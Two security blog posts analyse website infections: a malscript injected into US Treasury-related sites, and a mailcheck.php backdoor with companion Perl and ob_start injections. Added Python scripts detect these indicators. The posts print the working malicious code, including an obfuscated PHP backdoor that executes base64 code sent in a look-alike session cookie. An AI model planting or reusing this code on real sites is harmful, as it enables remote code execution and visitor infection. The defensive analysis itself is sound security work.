Treasury .gov websites hacked

AVG announced that the websites (Bureau of Engraving and Printing) and were injected with a malscript:

<SCR IPT (space added)>
function addCookie(name, value, hours) {
    var date = new Date();
    var expires = "; expires=" + date.toGMTString();
    document.cookie = name + "=" + value + expires + "; ";
}

document.write('<iframe frameborder="0" onload=\' if (!this.src){
this.src=""; this.height=0; this.width=0;} \'></iframe>');
addCookie("cook", "1", 24);
</SCR IPT (space added)>

According to this webpage: “Panda analysts speculate that hackers used a common attack technique known as SQL injection, to compromise the U.S. Treasury website. However, other experts think the incident is related to the recent mass compromise at Network Solutions, where the website is hosted. This possibility is enforced by the use of the malicious domain in both attacks.”

However, it could also be that someone with FTP access to the website had a virus. The virus steals FTP login credentials and sends them to a server, which then infects the websites those credentials give it legitimate access to. I see no mention of that possibility. Because this code was injected after the closing html tag, I seriously doubt that it was SQL injection: possible, but highly unlikely.
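The tell the post relies on, code sitting after the closing html tag, is easy to check for mechanically. Below is an added example (not code from the post or from AVG): a small Python script that reports active content after the last closing html tag and flags iframes that are sized to zero or assign their own src from an onload handler, the two traits of the injected iframe quoted above. The sample pages are constructed for the example and the src hostname is a placeholder.

```python
import re

# Constructed sample page, modelled on the injection quoted above: the malscript sits
# after the closing </html> tag, and the iframe it writes is resized to 0x0 from its
# onload handler. The src value is a placeholder, not the real domain.
INFECTED_PAGE = """<html><head><title>Sample page</title></head>
<body><p>Legitimate content.</p></body></html>
<script>
function addCookie(name, value, hours) {
    var date = new Date();
    var expires = "; expires=" + date.toGMTString();
    document.cookie = name + "=" + value + expires + "; ";
}
document.write('<iframe frameborder="0" onload=\\' if (!this.src){ this.src="http://placeholder.invalid/"; this.height=0; this.width=0;} \\'></iframe>');
addCookie("cook", "1", 24);
</script>
"""

# Constructed clean page: a normal, visibly sized iframe inside the body.
CLEAN_PAGE = """<html><head><title>Sample page</title></head>
<body><p>Legitimate content.</p>
<iframe src="https://example.com/widget" width="300" height="200"></iframe>
</body></html>
"""

CLOSING_HTML = re.compile(r"</html\s*>", re.IGNORECASE)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# height=0 / width=0 either as an attribute or as this.height=0 inside a handler
ZERO_SIZE = re.compile(r"\b(?:height|width)\s*=\s*['\"]?0\b", re.IGNORECASE)
# an onload handler that sets the frame's own src (the src is hidden from static markup)
SELF_SRC = re.compile(r"onload\s*=.*?this\.src\s*=", re.IGNORECASE | re.DOTALL)


def content_after_html(page):
    """Return the text that follows the last closing </html> tag ("" if none)."""
    matches = list(CLOSING_HTML.finditer(page))
    if not matches:
        return ""
    return page[matches[-1].end():].strip()


def find_indicators(page):
    """Return human-readable indicators found in one HTML document (empty list if clean)."""
    findings = []
    tail = content_after_html(page)
    if re.search(r"<script\b|<iframe\b", tail, re.IGNORECASE):
        findings.append("active content after the closing </html> tag")
    for tag in IFRAME_TAG.findall(page):
        if ZERO_SIZE.search(tag):
            findings.append("iframe sized to zero: " + tag[:60])
        if SELF_SRC.search(tag):
            findings.append("iframe assigns its own src from onload: " + tag[:60])
    return findings


if __name__ == "__main__":
    for name, page in (("infected", INFECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, "->", find_indicators(page) or "no indicators")
```

Run it over pages fetched from your own site (or over files in the web root) and treat any hit as a reason to diff the file against a known-good copy; the check is a heuristic, so a page that legitimately emits markup after the closing tag will also be reported.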

Could it have been part of the larger compromise at the hosting provider? Possibly, although the last I heard and read, they had cleaned that all up. I know that the first round targeted WordPress blogs, but later repeat attacks targeted all websites at the hosting provider.

Could it be that these sites were untouched until now? We may never know. But I do know that Network Solutions has always responded quickly to infections and taken responsibility when the “stuff” hits the fan. I have applauded them before and I do so now as well.

Could this be more finger pointing at someone other than who’s responsible? No, that never happens in the government – does it?

Please leave your comments below…

Thank you.


Attack of mailcheck.php and

This attack isn’t anything new; it was used on a number of Italian sites in March 2010, but we’ve been seeing more of it infecting websites recently, so I thought I’d elaborate.

Quite often, when scanning or cleaning infected websites, when we see the mailcheck.php file we also see the file, but that isn’t cast in stone. However, we have not seen by itself. In other words, mailcheck.php can appear by itself, but does not – at least from what we’ve seen.

The mailcheck.php file usually contains this code:

<?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9'));
echo "checking email...";?>



Which deobfuscates to:

if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}

In other words, any request that carries a cookie named PHPSESSIID (note the extra I, a look-alike of PHP’s normal PHPSESSID session cookie) has that cookie’s value base64-decoded and executed as PHP, after which the script exits. The “checking email…” message is just there to make the file look harmless.

The file is programmed in Perl and looks like:

use MIME::Base64 ();eval MIME::Base64::decode("JGMgPSAkRU5WeyJIVFRQX0NPT0tJRSJ9O0BjID0gc3BsaXQgLzsvLCAkYztmb3JlYWNoICRhIChA\nYyl7JGEgPX4gbS9QSFBTRVNTSUlEPSguKikvO2lmIChsZW5ndGgoJDEpID4gMCkge2V2YWwgTUlN\nRTo6QmFzZTY0OjpkZWNvZGUoJDEpO2RpZSAiIjt9fQ==");
$P = "Lf'njItkk";
$WinNT = 0;
$NTCmdSep = "&";
$UnixCmdSep = ";";
$CommandTimeoutDuration = 120;
$ShowDynamicOutput = 1;

As you can see, this code also uses base64 decoding even though it’s written in Perl. Same strategy, different programming language.

With the infection of mailcheck.php and/or, we’ve seen a number of .php and sometimes even .html files that have PHP code inserted at the top of the file that looks like:

<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">function t()…

What’s interesting about this malscript is that it uses the ‘ob_start’ function to run its code: the callback is handed the whole page output and appends the script to it. ob_start is used by many WordPress sites, software galleries and other software and plugins for a large variety of websites.

This clearly shows how clever the hackers are. They’re actually using valid functions found on many websites to run their malscripts. Also, by naming their malscript “security_update” they hope that people will overlook their code and move on to other, more harmful-looking code instead.
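Both the mailcheck.php backdoor and the ob_start injection can be triaged without running anything on the server. The following is an added example, not code from the post: a Python script that peels the eval(base64_decode(...)) and eval MIME::Base64::decode(...) wrappers from the PHP and Perl snippets quoted above and reports three patterns described in this post: eval of request-controlled data (the PHPSESSIID cookie backdoor), the look-alike cookie name itself, and an ob_start callback that appends a script tag to every page. The sample files are constructed from the base64 strings quoted above; everything else in them, and the regexes, are assumptions of the example.

```python
import base64
import re

# Constructed samples built from the snippets quoted above. Only the base64 strings
# are the real ones; the surrounding code is a placeholder for the example.
MAILCHECK_PHP = (
    "<?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9'));\n"
    'echo "checking email...";?>'
)
PERL_DROPPER = (
    'use MIME::Base64 ();eval MIME::Base64::decode("JGMgPSAkRU5WeyJIVFRQX0NPT0tJRSJ9O0BjID0gc3BsaXQgLzsvLCAkYztmb3JlYWNoICRhIChA\\n'
    'Yyl7JGEgPX4gbS9QSFBTRVNTSUlEPSguKikvO2lmIChsZW5ndGgoJDEpID4gMCkge2V2YWwgTUlN\\n'
    'RTo6QmFzZTY0OjpkZWNvZGUoJDEpO2RpZSAiIjt9fQ==");\n'
    '$P = "Lf\'njItkk";\n'
)
INJECTED_PHP = (
    "<?php ob_start('security_update'); function security_update($buffer){"
    "return $buffer.'<script language=\"javascript\">function t(){}</script>';} ?>\n"
    "<html><body>site</body></html>"
)
CLEAN_PHP = "<?php ob_start(); echo 'hello'; ?>"

# eval(base64_decode('...')) as in the PHP sample; eval MIME::Base64::decode("...") as in Perl
PHP_EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
PERL_EVAL_B64 = re.compile(r"eval\s+MIME::Base64::decode\s*\(\s*['\"]([A-Za-z0-9+/=\s\\]+)['\"]\s*\)")
EVAL_CALL = re.compile(r"\beval\b")
REQUEST_SOURCE = re.compile(r"\$_(?:COOKIE|GET|POST|REQUEST)\b|HTTP_COOKIE|QUERY_STRING")
# PHPSESS...ID that is not exactly PHPSESSID (PHP's real session cookie name)
LOOKALIKE_COOKIE = re.compile(r"PHPSESS(?!ID\b)\w*ID")
OB_CALLBACK = re.compile(r"ob_start\s*\(\s*['\"](\w+)['\"]\s*\)")


def peel_layers(code, max_depth=5):
    """Decode nested base64-wrapped eval() calls; returns decoded layers, outermost first."""
    layers = []
    for _ in range(max_depth):
        m = PHP_EVAL_B64.search(code) or PERL_EVAL_B64.search(code)
        if not m:
            break
        b64 = re.sub(r"\\n|\s+", "", m.group(1))  # drop Perl "\n" escapes and whitespace
        code = base64.b64decode(b64).decode("latin-1")
        layers.append(code)
    return layers


def classify(code):
    """Return the list of indicators found in one source file (empty list if none)."""
    findings = []
    layers = peel_layers(code)
    if layers:
        findings.append("%d base64-wrapped eval layer(s)" % len(layers))
    for text in [code] + layers:
        if EVAL_CALL.search(text) and REQUEST_SOURCE.search(text):
            msg = "eval of request-controlled data (cookie/parameter backdoor)"
            if msg not in findings:
                findings.append(msg)
        if LOOKALIKE_COOKIE.search(text):
            msg = "cookie name imitating PHPSESSID"
            if msg not in findings:
                findings.append(msg)
    m = OB_CALLBACK.search(code)
    if m:
        name = m.group(1)
        body = re.search(r"function\s+%s\s*\([^)]*\)\s*\{(.*?)\}" % re.escape(name), code, re.DOTALL)
        if body and re.search(r"<script\b", body.group(1), re.IGNORECASE):
            findings.append("ob_start callback %r appends a <script> to every page" % name)
    return findings


if __name__ == "__main__":
    samples = (("mailcheck.php", MAILCHECK_PHP), ("perl dropper", PERL_DROPPER),
               ("injected .php file", INJECTED_PHP), ("clean file", CLEAN_PHP))
    for name, sample in samples:
        print(name, "->", classify(sample) or "no indicators")
```

The decode step is the useful part when cleaning a site: seeing that the payload executes whatever arrives in a PHPSESSIID cookie tells you the attacker needs no further foothold than a plain HTTP request, so every copy of the file has to go, not just the one that was noticed.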

What can you do if you find this on your website?

Again, this type of attack is the result of a virus that steals the FTP passwords from a PC and sends them to a server, which then modifies the files on the website and adds the mailcheck.php and/or the files so the attackers can re-infect the website after the owner has cleaned the site and changed the FTP passwords.

I recommend using WS_FTP by Ipswitch because this program does not save the stored passwords in plain text. They are encrypted, which means the hackers have to do more work in order to use them. It’s not that they aren’t “hackable”; it’s just that the hackers have so many other PCs and websites that are easily hacked that, right now, they probably won’t spend the time or effort cracking the encryption.

You can also check to see if your hosting provider allows you to use SFTP instead of FTP. SFTP is encrypted traffic so a hacker’s virus can’t easily sniff the traffic and see the plain text username and password.

If you have any comments about this information or have a specific instance of a similar infection, please post your comments below.

Thank you.